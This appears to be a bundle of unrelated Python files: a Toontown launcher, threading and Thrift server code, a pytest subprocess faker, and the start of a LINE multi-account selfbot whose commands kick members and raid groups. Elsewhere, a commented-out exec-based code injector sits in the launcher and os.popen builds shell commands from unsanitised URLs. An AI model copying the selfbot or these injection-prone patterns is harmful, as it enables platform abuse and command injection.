ConfigVariableDouble('extractor-step-time').setValue(0.01)
backgroundNode = tempLoader.loadSync(Filename('phase_3/models/gui/loading-background'))
backgroundNodePath = aspect2d.attachNewNode(backgroundNode, 0)
backgroundNodePath.setPos(0.0, 0.0, 0.0)
backgroundNodePath.setScale(render2d, VBase3(1))
backgroundNodePath.find('**/fg').hide()
logo = OnscreenImage(
image = 'phase_3/maps/toontown-logo.png',
scale = (1 / (4.0 / 3.0), 1, 1 / (4.0 / 3.0)),
pos = backgroundNodePath.find('**/fg').getPos())
logo.setTransparency(TransparencyAttrib.MAlpha)
logo.setBin('fixed', 20)
logo.reparentTo(backgroundNodePath)
backgroundNodePath.find('**/bg').setBin('fixed', 10)
base.graphicsEngine.renderFrame()
DirectGuiGlobals.setDefaultRolloverSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_rollover.ogg'))
DirectGuiGlobals.setDefaultClickSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_create_toon_fwd.ogg'))
DirectGuiGlobals.setDefaultDialogGeom(loader.loadModel('phase_3/models/gui/dialog_box_gui'))
PGUIGlobals.setDefaultRolloverSound(base.loadSfx('phase_3/audio/sfx/GUI_rollover.ogg'))
PGUIGlobals.setDefaultClickSound(base.loadSfx('phase_3/audio/sfx/GUI_create_toon_fwd.ogg'))
PGUIGlobals.setDefaultDialogGeom(loader.loadModel('phase_3/models/gui/dialog_box_gui'))
from toontown.toonbase import TTLocalizer
from otp.otpbase import OTPGlobals
OTPGlobals.setDefaultProductPrefix(TTLocalizer.ProductPrefix)
# For Devs only. (The below)
'''from direct.stdpy import threading, thread
def __inject_wx(_):
code = textbox.GetValue()
exec (code, globals())
def openInjector_wx():
import wx
app = wx.App(redirect = False)
frame = wx.Frame(None, title = "TTPA Dev Injector", size=(640, 400), style=wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.MINIMIZE_BOX)
panel = wx.Panel(frame)
button = wx.Button(parent = panel, id = -1, label = "Inject", size = (50, 20), pos = (295, 0))
global textbox
textbox = wx.TextCtrl(parent = panel, id = -1, pos = (20, 22), size = (600, 340), style = wx.TE_MULTILINE)
frame.Bind(wx.EVT_BUTTON, __inject_wx, button)
frame.Show()
app.SetTopWindow(frame)
textbox.AppendText(" ")
threading.Thread(target = app.MainLoop).start()
openInjector_wx()'''
if base.musicManagerIsValid:
music = base.loader.loadMusic('phase_3/audio/bgm/tt_theme.ogg')
if music:
music.setLoop(1)
music.setVolume(0.9)
music.play()
notify.info('Loading the default GUI sounds...')
DirectGuiGlobals.setDefaultRolloverSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_rollover.ogg'))
DirectGuiGlobals.setDefaultClickSound(base.loader.loadSfx('phase_3/audio/sfx/GUI_create_toon_fwd.ogg'))
else:
music = None
from toontown.toonbase import ToontownLoader
from direct.gui.DirectGui import *
serverVersion = base.config.GetString('server-version', 'no_version_set')
'''
Let's have these here so you can tell if dev or debug mode is enabled or not
easily.
'''
if __dev__:
serverVersionText = serverVersion + "-dev"
elif __debug__:
serverVersionText = serverVersion + "-debug"
else:
serverVersionText = serverVersion
version = OnscreenText(serverVersionText, pos = (-1.3, -0.975), scale = 0.06, fg = Vec4(0, 0, 0, 1), align = TextNode.ALeft)
version.setPos(0.03, 0.03)
version.reparentTo(base.a2dBottomLeft)
from toontown.suit import Suit
Suit.loadModels()
loader.beginBulkLoad('init', TTLocalizer.LoaderLabel, 138, 0, TTLocalizer.TIP_NONE, 0)
from toontown.toonbase.ToonBaseGlobal import *
from direct.showbase.MessengerGlobal import *
from toontown.distributed import ToontownClientRepository
cr = ToontownClientRepository.ToontownClientRepository(serverVersion, launcher)
cr.music = music
del music
base.initNametagGlobals()
base.cr = cr
loader.endBulkLoad('init')
from otp.friends import FriendManager
from otp.distributed.OtpDoGlobals import *
cr.generateGlobalObject(OTP_DO_ID_FRIEND_MANAGER, 'FriendManager')
if not launcher.isDummy():
base.startShow(cr, launcher.getGameServer())
else:
base.startShow(cr)
backgroundNodePath.reparentTo(hidden)
backgroundNodePath.removeNode()
del backgroundNodePath
del backgroundNode
del tempLoader
version.cleanup()
del version
base.loader = base.loader
__builtin__.loader = base.loader
autoRun = ConfigVariableBool('toontown-auto-run', 1)
if autoRun:
try:
base.run()
except SystemExit:
raise
except:
from toontown.toonbase import ToonPythonUtil as PythonUtil
print PythonUtil.describeException()
raise
|
gthread.py
|
import aio
import inspect
# mark not started but no error
aio.error = None
aio.paused = False
aio.fd = {}
aio.pstab = {}
def _shutdown():
print(__file__, "_shutdown")
# https://docs.python.org/3/library/threading.html#threading.excepthook
# a green thread
# FIXME: fix wapy BUG 882 so target can be None too in preempt mode
# TODO: default granularity with https://docs.python.org/3/library/sys.html#sys.setswitchinterval
class Lock:
count = 0
def __enter__(self):
self.acquire()
def __exit__(self, *tb):
self.release()
def acquire(self, blocking=True, timeout=- 1):
self.count += 1
return True
def release(self):
self.count -= 1
def locked(self):
return self.count>0
class Condition:
def __init__(self, lock=None):
self.lock = lock or Lock()
def acquire(self, *args):
return self.lock.acquire()
def release(self):
self.lock.release()
def wait(self, timeout=None):
raise RuntimeError("notify not supported")
def wait_for(self, predicate, timeout=None):
raise RuntimeError("wait not supported")
class Thread:
def __init__(
self, group=None, target=None, name=None, args=(), kwargs={}, *, daemon=None
):
# def __init__(self, group=None, target=None, name=None, args=(), kwargs={}):
self.args = args
self.kwargs = kwargs
self.name = name
self.slice = 0
self.last = aio.rtclock()
if target:
if hasattr(target, "run"):
if name is None:
self.name = name or target.__class__.__name__
self.run = target.run
else:
self.run = target
if name is None:
try:
self.name = "%s-%s" % (self.run.__name__, id(self))
except:
pass
else:
target = self
if self.name is None:
self.name = "%s-%s" % (self.__class__.__name__, id(self))
self.status = None
async def wrap(self):
for idle in self.run(*self.args, **self.kwargs):
await aio.sleep(0)
async def runner(self, coro):
self.status = True
try:
# TODO: pass thread local context here
async with aio.ctx(self.slice).call(coro):
self.status = False
except Exception as e:
self.status = repr(e)
sys.print_exception(e, sys.stderr)
if __UPY__:
def __iter__(self):
if self.status is True:
rtc = aio.rtclock()
self.delta = (rtc - self.last) - self.slice
if self.delta < 0:
self.delta = 0
yield from aio.sleep_ms(self.slice - int(self.delta / 2))
self.last = rtc
__await__ = __iter__
else:
def __await__(self):
if self.status is True:
rtc = aio.rtclock()
self.delta = (rtc - self.last) - self.slice
if self.delta < 0:
self.delta = 0
# no sleep_ms on cpy
yield from aio.sleep_ms(
float(self.slice - int(self.delta / 2)) / 1_000
).__await__()
# return aio.sleep( float(self.slice - int(self.delta / 2)) / 1_000 )
self.last = rtc
def rt(self, slice):
self.slice = int(float(slice) * 1_000)
return self
def start(self):
aio.pstab.setdefault(self.name, [])
if self.run:
if not inspect.iscoroutinefunction(self.run):
self.status = True
aio.create_task(self.wrap())
else:
coro = self.run(*self.args, **self.kwargs)
pdb("168:", self.name, "starting", coro)
aio.create_task(self.runner(coro))
aio.pstab[self.name].append(self)
return self
def join(self):
embed.enable_irq()
while self.is_alive():
aio_suspend()
embed.disable_irq()
def __bool__(self):
return self.is_alive() and not aio.exit
def is_alive(self):
return self.status is True
def service(srv, *argv, **kw):
embed.log(f"starting green thread : {srv}")
thr = aio.Thread(group=None, target=srv, args=argv, kwargs=kw).start()
srv.__await__ = thr.__await__
return aio.pstab.setdefault(srv, thr)
aio.task = service
def proc(srv):
return aio.pstab.get(srv)
class Runnable:
def __await__(self):
yield from aio.pstab.get(self).__await__()
# replace with green threading
import sys
sys.modules["threading"] = sys.modules["aio.gthread"]
|
TProcessPoolServer.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
logger = logging.getLogger(__name__)
from multiprocessing import Process, Value, Condition, reduction
from TServer import TServer
from thrift.transport.TTransport import TTransportException
class TProcessPoolServer(TServer):
"""Server with a fixed size pool of worker subprocesses to service requests
Note that if you need shared state between the handlers - it's up to you!
Written by Dvir Volk, doat.com
"""
def __init__(self, *args):
TServer.__init__(self, *args)
self.numWorkers = 10
self.workers = []
self.isRunning = Value('b', False)
self.stopCondition = Condition()
self.postForkCallback = None
def setPostForkCallback(self, callback):
if not callable(callback):
raise TypeError("This is not a callback!")
self.postForkCallback = callback
def setNumWorkers(self, num):
"""Set the number of worker threads that should be created"""
self.numWorkers = num
def workerProcess(self):
"""Loop getting clients from the shared queue and process them"""
if self.postForkCallback:
self.postForkCallback()
while self.isRunning.value:
try:
client = self.serverTransport.accept()
if not client:
continue
self.serveClient(client)
except (KeyboardInterrupt, SystemExit):
return 0
except Exception, x:
logger.exception(x)
def serveClient(self, client):
"""Process input/output from a client for as long as possible"""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransportException, tx:
pass
except Exception, x:
logger.exception(x)
itrans.close()
otrans.close()
def serve(self):
"""Start workers and put into queue"""
# this is a shared state that can tell the workers to exit when False
self.isRunning.value = True
# first bind and listen to the port
self.serverTransport.listen()
# fork the children
for i in range(self.numWorkers):
try:
w = Process(target=self.workerProcess)
w.daemon = True
w.start()
self.workers.append(w)
except Exception, x:
logger.exception(x)
# wait until the condition is set by stop()
while True:
self.stopCondition.acquire()
try:
self.stopCondition.wait()
break
except (SystemExit, KeyboardInterrupt):
break
except Exception, x:
logger.exception(x)
self.isRunning.value = False
def stop(self):
self.isRunning.value = False
self.stopCondition.acquire()
self.stopCondition.notify()
self.stopCondition.release()
|
loader.py
|
import logging
import os
import sys
import threading
log = logging.getLogger( __name__ )
def download_prepare( directory ):
""""""
log.info( 'Creating dumps directory' )
os.popen( 'mkdir -p %s' % directory )
def dump_download( url, directory ):
""""""
# extract filename from url
filename = url[url.rfind( '/' )+1:]
path = '/'.join( [directory, filename] )
if os.path.isfile( path ):
log.info( 'File already downloaded. see %s', path )
return path
# download anew
log.info( 'Downloading %s ..', filename )
os.popen( 'wget --quiet %s ' % url )
log.info( 'Moving to dumps-directory ..' )
os.popen( 'mv %s %s' % ( filename, directory ) )
return path
def dump_extract( file ):
""""""
if not file:
return None
if not os.path.isfile( file ):
log.error( 'File not found, %s', file )
return None
xfile = file[0:file.rfind( '.bz2' )]
if os.path.isfile(xfile + '.csv'):
log.info( 'File already converted. see %s', xfile + '.csv' )
return xfile
log.info( 'Extracting %s', file )
os.popen( './to_one-liner.sh %s %s %s' % ( os.path.dirname( file ), os.path.basename( file ), '.bz2' ) )
return xfile
def dump_convert( file ):
""""""
if not file:
return None
if not os.path.isfile( file ):
log.error( 'File to extract not found, %s', file )
return None
log.info( 'Converting %s', file )
os.popen( './to_csv.sh %s %s %s' % ( file, 'true', '.ttl' ) )
return file
def dump_append( file, output_file ):
""""""
file = file + '.csv'
if not file:
return None
if not os.path.isfile( file ):
log.error( 'File to append not found, %s', file )
return None
os.popen( 'cat %s >> %s' % ( file, output_file ) )
def dump_cleanup( file ):
""""""
if not file:
return None
os.remove( file )
def handle_url( sem, url, directory ):
""""""
with sem:
log.info( 'Handling %s', url )
# returns downloaded file
file = dump_download( url, directory )
# returns extracted file
file = dump_extract( file )
# returns extracted file
file = dump_convert( file )
# rm xf
dump_cleanup( file )
# append
# dump_append( file, directory + '/dbpedia-all-en.ttl.csv' )
log.info( 'Done' )
def start_crawling( urls, directory, no_of_threads=1 ):
""""""
download_prepare( directory )
threads = []
sem = threading.Semaphore( no_of_threads )
for url in urls:
filename = url[url.rfind( '/' )+1:]
# create a thread for each url. work load is limited by the semaphore
t = threading.Thread( target = handle_url, name = filename, args = ( sem, url, directory ) )
t.start()
threads.append( t )
# wait for all threads to finish
for t in threads:
t.join()
|
email.py
|
from flask_mail import Message
from app import mail
from flask import render_template
from app import app
from threading import Thread
from flask_babel import _
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_mail(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_mail(_('[Microblog] Reset Your Password'),
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
|
core.py
|
# -*- coding: utf-8 -*-
import io
import os
import subprocess
import sys
import time
from collections import defaultdict
from collections import deque
from copy import deepcopy
from typing import Any as AnyType
from typing import Callable
from typing import DefaultDict
from typing import Deque
from typing import Dict
from typing import List
from typing import Optional
from typing import Sequence
from typing import Tuple
from typing import Type
from typing import Union
from .utils import Any
from .utils import Command
from .utils import Thread
OPTIONAL_TEXT = Union[str, bytes, None]
OPTIONAL_TEXT_OR_ITERABLE = Union[
str, bytes, None, Sequence[Union[str, bytes]],
]
BUFFER = Union[None, io.BytesIO, io.StringIO]
ARGUMENT = Union[str, Any]
COMMAND = Union[Sequence[ARGUMENT], str, Command]
class PluginInternalError(Exception):
"""Raised in case of an internal error in the plugin"""
class FakePopen:
"""Base class that fakes the real subprocess.Popen()"""
stdout: BUFFER = None
stderr: BUFFER = None
returncode: Optional[int] = None
text_mode: bool = False
pid: int = 0
def __init__(
self,
command: Union[
Union[bytes, str],
Sequence[Union[str, bytes, "os.PathLike[str]", "os.PathLike[bytes]"]],
],
stdout: OPTIONAL_TEXT_OR_ITERABLE = None,
stderr: OPTIONAL_TEXT_OR_ITERABLE = None,
returncode: int = 0,
wait: Optional[float] = None,
callback: Optional[Callable] = None,
callback_kwargs: Optional[Dict[str, AnyType]] = None,
stdin_callable: Optional[Callable] = None,
**_: Dict[str, AnyType]
) -> None:
self.args = command
self.__stdout: OPTIONAL_TEXT_OR_ITERABLE = stdout
self.__stderr: OPTIONAL_TEXT_OR_ITERABLE = stderr
self.__returncode: Optional[int] = returncode
self.__wait: Optional[float] = wait
self.__thread: Optional[Thread] = None
self.__callback: Optional[Optional[Callable]] = callback
self.__callback_kwargs: Optional[Dict[str, AnyType]] = callback_kwargs
self.__stdin_callable: Optional[Optional[Callable]] = stdin_callable
def __enter__(self) -> "FakePopen":
return self
def __exit__(self, *args: List, **kwargs: Dict) -> None:
if self.__thread and self.__thread.exception:
raise self.__thread.exception
def communicate(
self, input: OPTIONAL_TEXT = None, timeout: Optional[float] = None
) -> Tuple[AnyType, AnyType]:
if input and self.__stdin_callable:
callable_output = self.__stdin_callable(input)
if isinstance(callable_output, dict):
self.stdout = self._extend_stream_from_dict(
callable_output, "stdout", self.stdout
)
self.stderr = self._extend_stream_from_dict(
callable_output, "stderr", self.stderr
)
return (
self.stdout.getvalue() if self.stdout else None,
self.stderr.getvalue() if self.stderr else None,
)
def _extend_stream_from_dict(
self, dictionary: Dict[str, AnyType], key: str, stream: BUFFER
) -> BUFFER:
data = dictionary.get(key)
if data:
return self._prepare_buffer(input=data, io_base=stream)
return None
def poll(self) -> Optional[int]:
return self.returncode
def wait(self, timeout: Optional[float] = None) -> int:
if timeout and self.__wait and timeout < self.__wait:
self.__wait -= timeout
raise subprocess.TimeoutExpired(self.args, timeout)
if self.__thread is not None:
self.__thread.join()
if self.returncode is None and self.__returncode is not None:
self.returncode = self.__returncode
if self.__thread.exception:
raise self.__thread.exception
if self.returncode is None:
raise PluginInternalError
return self.returncode
def configure(self, **kwargs: Optional[Dict]) -> None:
"""Setup the FakePopen instance based on a real Popen arguments."""
self.__universal_newlines = kwargs.get("universal_newlines", None)
text = kwargs.get("text", None)
encoding = kwargs.get("encoding", None)
errors = kwargs.get("errors", None)
if text and sys.version_info < (3, 7):
raise TypeError("__init__() got an unexpected keyword argument 'text'")
self.text_mode = bool(text or self.__universal_newlines or encoding or errors)
# validation taken from the real subprocess
if (
text is not None
and self.__universal_newlines is not None
and bool(self.__universal_newlines) != bool(text)
):
raise subprocess.SubprocessError(
"Cannot disambiguate when both text "
"and universal_newlines are supplied but "
"different. Pass one or the other."
)
if kwargs.get("stdout") == subprocess.PIPE:
self.stdout = self._prepare_buffer(self.__stdout)
stderr = kwargs.get("stderr")
if stderr == subprocess.STDOUT and self.__stderr:
self.stdout = self._prepare_buffer(self.__stderr, self.stdout)
elif stderr == subprocess.PIPE:
self.stderr = self._prepare_buffer(self.__stderr)
def _prepare_buffer(
self, input: OPTIONAL_TEXT_OR_ITERABLE, io_base: BUFFER = None,
) -> Union[io.BytesIO, io.StringIO]:
linesep = self._convert(os.linesep)
if isinstance(input, (list, tuple)):
# need to disable mypy, as input and linesep are unions,
# mypy thinks that the types might be incompatible, but
# the _convert() function handles that
input = linesep.join(map(self._convert, input)) # type: ignore
# Add trailing newline if data is present.
if input:
# same reason to disable mypy as above
input += linesep # type: ignore
if isinstance(input, str) and not self.text_mode:
input = input.encode()
if isinstance(input, bytes) and self.text_mode:
input = input.decode()
if input and self.__universal_newlines and isinstance(input, str):
input = input.replace("\r\n", "\n")
if io_base is not None:
# same reason for disabling mypy as in `input = linesep.join...`:
# both are union so could be incompatible if not _convert()
input = io_base.getvalue() + (input) # type: ignore
io_base = io.StringIO() if self.text_mode else io.BytesIO()
if input is None:
return io_base
# similar as above - mypy has to be disabled because unions
io_base.write(input) # type: ignore
return io_base
def _convert(self, input: Union[str, bytes]) -> Union[str, bytes]:
if isinstance(input, bytes) and self.text_mode:
return input.decode()
if isinstance(input, str) and not self.text_mode:
return input.encode()
return input
def _wait(self, wait_period: float) -> None:
time.sleep(wait_period)
if self.returncode is None:
self._finish_process()
def run_thread(self) -> None:
"""Run the user-defined callback or wait in a thread."""
if self.__wait is None and self.__callback is None:
self._finish_process()
else:
if self.__callback:
self.__thread = Thread(
target=self.__callback,
args=(self,),
kwargs=self.__callback_kwargs or {},
)
else:
self.__thread = Thread(target=self._wait, args=(self.__wait,))
self.__thread.start()
def _finish_process(self) -> None:
self.returncode = self.__returncode
if self.stdout:
self.stdout.seek(0)
if self.stderr:
self.stderr.seek(0)
class ProcessNotRegisteredError(Exception):
"""
Raised when the attempted command wasn't registered before.
Use `fake_process.allow_unregistered(True)` if you want to use real subprocess.
"""
class ProcessDispatcher:
"""Main class for handling processes."""
process_list: List["FakeProcess"] = []
built_in_popen: Optional[Optional[Callable]] = None
_allow_unregistered: bool = False
_cache: Dict["FakeProcess", Dict["FakeProcess", AnyType]] = dict()
_keep_last_process: bool = False
_pid: int = 0
@classmethod
def register(cls, process: "FakeProcess") -> None:
if not cls.process_list:
cls.built_in_popen = subprocess.Popen
subprocess.Popen = cls.dispatch # type: ignore
cls._cache[process] = {
proc: deepcopy(proc.definitions) for proc in cls.process_list
}
cls.process_list.append(process)
@classmethod
def deregister(cls, process: "FakeProcess") -> None:
cls.process_list.remove(process)
cache = cls._cache.pop(process)
for proc, processes in cache.items():
proc.definitions = processes
if not cls.process_list:
subprocess.Popen = cls.built_in_popen # type: ignore
cls.built_in_popen = None
@classmethod
def dispatch(cls, command: COMMAND, **kwargs: Optional[Dict]) -> FakePopen:
"""This method will be used instead of the subprocess.Popen()"""
command_instance, processes, process_instance = cls._get_process(command)
if process_instance:
process_instance.calls.append(command)
if not processes:
if not cls._allow_unregistered:
raise ProcessNotRegisteredError(
"The process '%s' was not registered."
% (
command
if isinstance(command, str)
else " ".join(str(item) for item in command),
)
)
else:
if cls.built_in_popen is None:
raise PluginInternalError
return cls.built_in_popen(command, **kwargs) # type: ignore
process = processes.popleft()
if not processes and process_instance is not None:
if cls._keep_last_process:
processes.append(process)
elif command_instance:
del process_instance.definitions[command_instance]
cls._pid += 1
if isinstance(process, bool):
# real process will be called
return cls.built_in_popen(command, **kwargs) # type: ignore
# Update the command with the actual command specified by the caller.
# This will ensure that Command objects do not end up unexpectedly in
# caller's objects (e.g. proc.args, CalledProcessError.cmd). Take care
# to preserve the dict that may still be referenced when using
# keep_last_process.
fake_popen_kwargs = process.copy()
fake_popen_kwargs["command"] = command
result = FakePopen(**fake_popen_kwargs)
result.pid = cls._pid
result.configure(**kwargs)
result.run_thread()
return result
@classmethod
def _get_process(
cls, command: COMMAND
) -> Tuple[
Optional[Command], Optional[Deque[Union[dict, bool]]], Optional["FakeProcess"]
]:
for proc in reversed(cls.process_list):
command_instance, processes = next(
(
(key, value)
for key, value in proc.definitions.items()
if key == command
),
(None, None),
)
process_instance = proc
if processes and isinstance(processes, deque):
return command_instance, processes, process_instance
return None, None, None
@classmethod
def allow_unregistered(cls, allow: bool) -> None:
cls._allow_unregistered = allow
@classmethod
def keep_last_process(cls, keep: bool) -> None:
cls._keep_last_process = keep
class IncorrectProcessDefinition(Exception):
"""Raised when the register_subprocess() has been called with wrong arguments"""
class FakeProcess:
"""Main class responsible for process operations"""
any: Type[Any] = Any
def __init__(self) -> None:
self.definitions: DefaultDict[Command, Deque[Union[Dict, bool]]] = defaultdict(
deque
)
self.calls: Deque[COMMAND] = deque()
def register_subprocess(
self,
command: COMMAND,
stdout: OPTIONAL_TEXT_OR_ITERABLE = None,
stderr: OPTIONAL_TEXT_OR_ITERABLE = None,
returncode: int = 0,
wait: Optional[float] = None,
callback: Optional[Callable] = None,
callback_kwargs: Optional[Dict[str, AnyType]] = None,
occurrences: int = 1,
stdin_callable: Optional[Callable] = None,
) -> None:
"""
Main method for registering the subprocess instances.
Args:
command: register the command that will be faked
stdout: value of the standard output
stderr: value of the error output
returncode: return code of the faked process
wait: artificially wait for the process to finish
callback: function that will be executed instead of the process
callback_kwargs: keyword arguments that will be passed into callback
occurrences: allow multiple usages of the same command
stdin_callable: function that will interact with stdin
"""
if wait is not None and callback is not None:
raise IncorrectProcessDefinition(
"The 'callback' and 'wait' arguments cannot be used "
"together. Add sleep() to your callback instead."
)
if not isinstance(command, Command):
command = Command(command)
self.definitions[command].extend(
[
{
"command": command,
"stdout": stdout,
"stderr": stderr,
"returncode": returncode,
"wait": wait,
"callback": callback,
"callback_kwargs": callback_kwargs,
"stdin_callable": stdin_callable,
}
]
* occurrences
)
def pass_command(self, command: COMMAND, occurrences: int = 1,) -> None:
"""
Allow to use a real subprocess together with faked ones.
Args:
command: allow to execute the supplied command
occurrences: allow multiple usages of the same command
"""
if not isinstance(command, Command):
command = Command(command)
self.definitions[command].extend([True] * occurrences)
def __enter__(self) -> "FakeProcess":
ProcessDispatcher.register(self)
return self
def __exit__(self, *args: List, **kwargs: Dict) -> None:
ProcessDispatcher.deregister(self)
def allow_unregistered(cls, allow: bool) -> None:
"""
Allow / block unregistered processes execution. When allowed, the real
subprocesses will be called. Blocking will raise the exception.
Args:
allow: decide whether the unregistered process shall be allowed
"""
ProcessDispatcher.allow_unregistered(allow)
def call_count(self, command: COMMAND) -> int:
"""
Count how many times a certain command was called. Can be used
together with `fake_process.any()`.
Args:
command: lookup command
Returns:
number of times a command was called
"""
if not isinstance(command, Command):
command_instance = Command(command)
return len(tuple(filter(lambda elem: elem == command_instance, self.calls)))
@classmethod
def keep_last_process(cls, keep: bool) -> None:
"""
Keep last process definition from being removed. That can allow / block
multiple execution of the same command.
Args:
keep: decide whether last process shall be kept
"""
ProcessDispatcher.keep_last_process(keep)
@classmethod
def context(cls) -> "FakeProcess":
"""Return a new FakeProcess instance to use it as a context manager."""
return cls()
|
script.py
|
import humanaction_client
import argparse
from threading import Thread
import time
from imutils.video import FileVideoStream
import imutils
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--video", required=True,
help="path to input video file")
args = vars(ap.parse_args())
def imshoww():
print("[INFO] starting video file thread...")
fvs = FileVideoStream(args["video"]).start()
time.sleep(1.0)
# start the FPS timer
fps = FPS().start()
# loop over frames from the video file stream
while fvs.more():
# grab the frame from the threaded video file stream, resize
# it, and convert it to grayscale (while still retaining 3
# channels)
frame = fvs.read()
frame = imutils.resize(frame, width=450)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = np.dstack([frame, frame, frame])
# display the size of the queue on the frame
cv2.putText(frame, "Queue Size: {}".format(fvs.Q.qsize()),
(10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 0), 2)
# show the frame and update the FPS counter
cv2.imshow("Frame", frame)
time.sleep(0.035)
cv2.waitKey(1)
fps.update()
# stop the timer and display FPS information
fps.stop()
print("[INFO] elasped time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
# do a bit of cleanup
cv2.destroyAllWindows()
fvs.stop()
thread = Thread(target = humanaction_client.run(args["video"]))
thread.daemon = True
thread.start()
Thread(target = imshoww).start()
|
10sb.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob
cl = LINETCR.LINE()
cl.login(qr=True)
cl.loginResult()
ki = LINETCR.LINE()
ki.login(qr=True)
ki.loginResult()
kk = LINETCR.LINE()
kk.login(qr=True)
kk.loginResult()
kc = LINETCR.LINE()
kc.login(qr=True)
kc.loginResult()
kb = LINETCR.LINE()
kb.login(qr=True)
kb.loginResult()
kd = LINETCR.LINE()
kd.login(qr=True)
kd.loginResult()
ke = LINETCR.LINE()
ke.login(qr=True)
ke.loginResult()
kh = LINETCR.LINE()
kh.login(qr=True)
kh.loginResult()
kj = LINETCR.LINE()
kj.login(qr=True)
kj.loginResult()
kf = LINETCR.LINE()
kf.login(qr=True)
kf.loginResult()
kg = LINETCR.LINE()
kg.login(qr=True)
kg.loginResult()
print u"login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage =""" ➰└ Commands Bots ┐➰
=====[ ™Amii™вσт ]=====
🔐 Me
🔐 TL: └ Text ┐
🔐 Mid
🔐 Up
🔐 Creator
🔐 Cancel! ~ Cancel pending invite 1 by 1
🔐 Copy└ @ ┐
🔐 Speed, Sp
🔐 Your name
🔐 List group
🔐 Qr on/off
🔐 Namelock on/off
🔐 Clock on/off
🔐 Change clock
🔐 Cn:└ Your Name ┐
🔐 Cancelall └ Reject spam invite ┐
🔐 Cancelall1└ K1 Reject spam invite ┐
🔐 Message set:└Text┐
🔐 Comment set: └Text┐
🔐 My message
🔐 My comment
🔐 Add confirm
🔐 Ginfo
🔐 Mid└ @ ┐ Tag
🔐 Banlist
🔐 Cek ban
🔐 Ban ~ Share contact
🔐 Unban ~ Share contact
🔐 Ban └ @ ┐ Tag
🔐 Unban └ @ ┐ Tag
🔐 Seeyou ~ KICK BLACKLIST USER
🔐 Gurl └ View Link Groups ┐
🔐 Say └ Text ┐
🔐 Cancel
🔐 Gn: └ Name ┐
🔐 Maaf!└ @ ┐ Tag
🔐 Nk └ @ ┐ Tag
🔐 BL└ @ ┐ Tag
🔐 Sorry!! └ @ ┐ Tag
🔐 /rusuh └ @ ┐ Tag
🔐 Anjay! ~ Play this group
🔐 Mentions
🔐 Invite └ Mid ┐
🔐 Respon
🔐 Set ~ View your setting
🔐 Gift
🔐 Gift1
🔐 Gift2
🔐 Gift3
🔐 Masuk beb ~ All Kicker join
🔐 Husss ~ All Kicker leave
🔐 Kuy1 /2/3~ All kicker join one by one
➰└ Commands Set ┐➰
🔐 Auto Like : on/off
🔐 Contact : on/off
🔐 Auto join : on/off
🔐 Auto Cancel : 1 on/off
🔐 Auto Like : on/off
🔐 Auto leave : on/off
🔐 Share : on/off
🔐 Auto add : on/off
🔐 Comment : on/off
🔐 Protect : on/off
🔐 Protect qr : on/off
🔐 Welcome : on/off
===[ ™Amii™вσт ]===
"""
KAC=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = kb.getProfile().mid
Emid = kd.getProfile().mid
Fmid = ke.getProfile().mid
Gmid = kg.getProfile().mid
Hmid = kh.getProfile().mid
Jmid = kj.getProfile().mid
Imid = kf.getProfile().mid
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Jmid,Imid]
admin=["ub5ae780d74acdd2c05b750ef7fb4ae31","u78e5efff85bf97393cc2c4b8ecf93d25","u2355fb85d6b43785e0b7770f956d0347"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':False,
'message':"Thanks for add Created by ┅═ই❂͡★Amii™┅═ই❂͡\n\n>> https://line.me/ti/p/~amiiqila_",
"lang":"JP",
"comment":"🔹Auto like by ☞ ┅═ই❂͡★Amii™┅═ই❂͡ \n\n>> https://line.me/ti/p/~amiiqila_",
"likeOn":True,
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"┅═ই❂͡★Amii™┅═ই❂͡ ",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protectionOn":True,
"Backup":True,
"qr":True,
"pname":{},
"pro_name":{},
"welcome":True,
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
setTime = {}
setTime = wait2['setTime']
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
setTime = {}
setTime = wait2["setTime"]
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
